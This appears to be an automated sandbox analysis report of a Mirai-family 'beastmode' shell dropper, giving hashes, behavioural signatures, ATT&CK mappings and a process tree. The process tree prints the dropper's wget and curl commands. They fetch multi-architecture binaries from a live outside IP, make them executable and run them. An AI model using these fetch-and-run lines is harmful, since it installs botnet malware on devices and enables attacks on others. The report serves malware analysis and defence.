Analysis
-
max time kernel
149s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
14-12-2024 03:03
Static task
static1
Behavioral task
behavioral1
Sample
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh
-
Size
2KB
-
MD5
624b68623e669355734d1149ffd5d430
-
SHA1
ce07fb83638c8fa2865aa2b3d007c35902f7d96a
-
SHA256
2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc
-
SHA512
143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23
Malware Config
Extracted
mirai
UNST
Signatures
-
Mirai family
-
Contacts a large (43511) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 709 chmod 737 chmod 757 chmod 812 chmod 866 chmod 680 chmod 778 chmod 791 chmod 830 chmod 848 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/B3ASTM0DE 681 B3ASTM0DE /tmp/B3ASTM0DE 711 B3ASTM0DE /tmp/B3ASTM0DE 738 B3ASTM0DE /tmp/B3ASTM0DE 758 B3ASTM0DE /tmp/B3ASTM0DE 779 B3ASTM0DE /tmp/B3ASTM0DE 792 B3ASTM0DE /tmp/B3ASTM0DE 813 B3ASTM0DE /tmp/B3ASTM0DE 831 B3ASTM0DE /tmp/B3ASTM0DE 849 B3ASTM0DE /tmp/B3ASTM0DE 867 B3ASTM0DE -
Modifies Watchdog functionality 1 TTPs 10 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog B3ASTM0DE File opened for modification /dev/misc/watchdog B3ASTM0DE File opened for modification /dev/watchdog B3ASTM0DE File opened for modification /dev/misc/watchdog B3ASTM0DE File opened for modification /dev/watchdog B3ASTM0DE File opened for modification /dev/watchdog B3ASTM0DE File opened for modification /dev/misc/watchdog B3ASTM0DE File opened for modification /dev/misc/watchdog B3ASTM0DE File opened for modification /dev/watchdog B3ASTM0DE File opened for modification /dev/misc/watchdog B3ASTM0DE -
Enumerates active TCP sockets 1 TTPs 6 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 6 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE File opened for reading /proc/net/tcp B3ASTM0DE -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/297/fd B3ASTM0DE File opened for reading /proc/602/fd B3ASTM0DE File opened for reading /proc/272/fd B3ASTM0DE File opened for reading /proc/298/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/596/exe B3ASTM0DE File opened for reading /proc/600/exe B3ASTM0DE File opened for reading /proc/815/fd B3ASTM0DE File opened for reading /proc/834/fd B3ASTM0DE File opened for reading /proc/298/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/816/fd B3ASTM0DE File opened for reading /proc/self/auxv curl File opened for reading /proc/268/fd B3ASTM0DE File opened for reading /proc/1/fd B3ASTM0DE File opened for reading /proc/274/fd B3ASTM0DE File opened for reading /proc/268/fd B3ASTM0DE File opened for reading /proc/600/fd B3ASTM0DE File opened for reading /proc/167/fd B3ASTM0DE File opened for reading /proc/789/fd B3ASTM0DE File opened for reading /proc/850/exe B3ASTM0DE File opened for reading /proc/652/fd B3ASTM0DE File opened for reading /proc/self/auxv curl File opened for reading /proc/267/fd B3ASTM0DE File opened for reading /proc/823/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/582/exe B3ASTM0DE File opened for reading /proc/self/auxv curl File opened for reading /proc/274/fd B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/331/fd B3ASTM0DE File opened for reading /proc/600/exe B3ASTM0DE File opened for reading /proc/272/fd B3ASTM0DE File opened for reading /proc/814/fd B3ASTM0DE File opened for reading /proc/267/fd B3ASTM0DE File opened for reading /proc/272/fd B3ASTM0DE File opened for reading /proc/596/exe B3ASTM0DE File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/272/fd B3ASTM0DE File opened for reading /proc/268/fd B3ASTM0DE File opened for reading /proc/331/fd B3ASTM0DE File opened for reading /proc/793/exe B3ASTM0DE File opened for reading /proc/793/fd B3ASTM0DE File opened for reading /proc/208/fd B3ASTM0DE File opened for reading /proc/826/fd B3ASTM0DE File opened for reading /proc/143/fd B3ASTM0DE File opened for reading /proc/208/fd B3ASTM0DE File opened for reading /proc/603/fd B3ASTM0DE File opened for reading /proc/298/fd B3ASTM0DE File opened for reading /proc/792/fd B3ASTM0DE File opened for reading /proc/795/fd B3ASTM0DE File opened for reading /proc/805/fd B3ASTM0DE File opened for reading /proc/833/fd B3ASTM0DE File opened for reading /proc/851/fd B3ASTM0DE File opened for reading /proc/602/fd B3ASTM0DE File opened for reading /proc/652/fd B3ASTM0DE File opened for reading /proc/273/fd B3ASTM0DE File opened for reading /proc/596/exe B3ASTM0DE File opened for reading /proc/640/fd B3ASTM0DE File opened for reading /proc/167/fd B3ASTM0DE File opened for reading /proc/806/fd B3ASTM0DE File opened for reading /proc/143/fd B3ASTM0DE -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 683 wget 694 curl 707 cat -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/b3astmode.x86 curl File opened for modification /tmp/b3astmode.arm7 wget File opened for modification /tmp/b3astmode.ppc wget File opened for modification /tmp/b3astmode.m68k wget File opened for modification /tmp/b3astmode.x86 wget File opened for modification /tmp/b3astmode.mips wget File opened for modification /tmp/b3astmode.mpsl wget File opened for modification /tmp/b3astmode.arm4 curl File opened for modification /tmp/b3astmode.arm6 curl File opened for modification /tmp/b3astmode.arm7 curl File opened for modification /tmp/b3astmode.ppc curl File opened for modification /tmp/b3astmode.m68k curl File opened for modification /tmp/b3astmode.mips curl File opened for modification /tmp/b3astmode.mpsl curl File opened for modification /tmp/b3astmode.arm5 wget File opened for modification /tmp/b3astmode.arm6 wget File opened for modification /tmp/b3astmode.sh4 wget File opened for modification /tmp/B3ASTM0DE 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh File opened for modification /tmp/b3astmode.arm5 curl File opened for modification /tmp/b3astmode.sh4 curl
Processes
-
/tmp/2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh/tmp/2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh1⤵
- Writes file to tmp directory
PID:648 -
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.x862⤵
- Writes file to tmp directory
PID:650
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676
-
-
/bin/catcat b3astmode.x862⤵PID:679
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.x86 systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-08Dm4M2⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:681
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:683
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.mips2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:694
-
-
/bin/catcat b3astmode.mips2⤵
- System Network Configuration Discovery
PID:707
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.mips b3astmode.x86 systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-08Dm4M2⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:711
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.mpsl2⤵
- Writes file to tmp directory
PID:713
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/catcat b3astmode.mpsl2⤵PID:736
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-08Dm4M2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:738
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm42⤵PID:740
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm42⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:745
-
-
/bin/catcat b3astmode.arm42⤵PID:756
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-08Dm4M2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
PID:758
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm52⤵
- Writes file to tmp directory
PID:759
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:776
-
-
/bin/catcat b3astmode.arm52⤵PID:777
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-08Dm4M2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:779
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm62⤵
- Writes file to tmp directory
PID:783
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.mips b3astmode.mpsl b3astmode.x86 systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-08Dm4M2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:792
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.arm72⤵
- Writes file to tmp directory
PID:809
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x862⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:813
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.ppc2⤵
- Writes file to tmp directory
PID:827
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x862⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:831
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.m68k2⤵
- Writes file to tmp directory
PID:843
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x862⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:849
-
-
/usr/bin/wgetwget http://15.228.54.104/beastmode/b3astmode.sh42⤵
- Writes file to tmp directory
PID:861
-
-
/usr/bin/curlcurl -O http://15.228.54.104/beastmode/b3astmode.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/chmodchmod +x 2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc.sh B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.sh4 b3astmode.x862⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/B3ASTM0DE./B3ASTM0DE2⤵
- Executes dropped EXE
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:867
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD56fdcdf8e1a1d76e45fa874a20a18b804
SHA18f8253e997ac2997a16e3a189f441d30d9a7675c
SHA256f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057
SHA512d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc
-
Filesize
24KB
MD58e2bc890571386d49be504c19d6ae5f4
SHA1ec10343c39481e9867cab49607feb8351baa17dd
SHA256e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2
SHA51275b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af
-
Filesize
275B
MD58a052866f3090135b18f374ce1049566
SHA1cc858d4367e62558a09416f9521c159ec02ce42f
SHA256efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120
SHA5120b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16
-
Filesize
49KB
MD5d585800f95f4f716d9faf633ebaa9433
SHA1ddf0a2bf2db94565ff0195178c35464c461bba26
SHA256ff3b43f66762a8b39fe29e4a99079f6086a9963015140775aa3ac5fe427ec558
SHA512af4c64a694d237e9994abaae75a5444050bbf87726b0d0025bdbcc94ce307b785ff93d79504069b390e51583db7fbc1735d164254bc3822b33154b96f6b94122
-
Filesize
22KB
MD5873c6ba01596fdbb9c469fe1e0180243
SHA19236be2f17ba4d7422bf8f579d95c6226d3eaa48
SHA2569959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170
SHA512f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee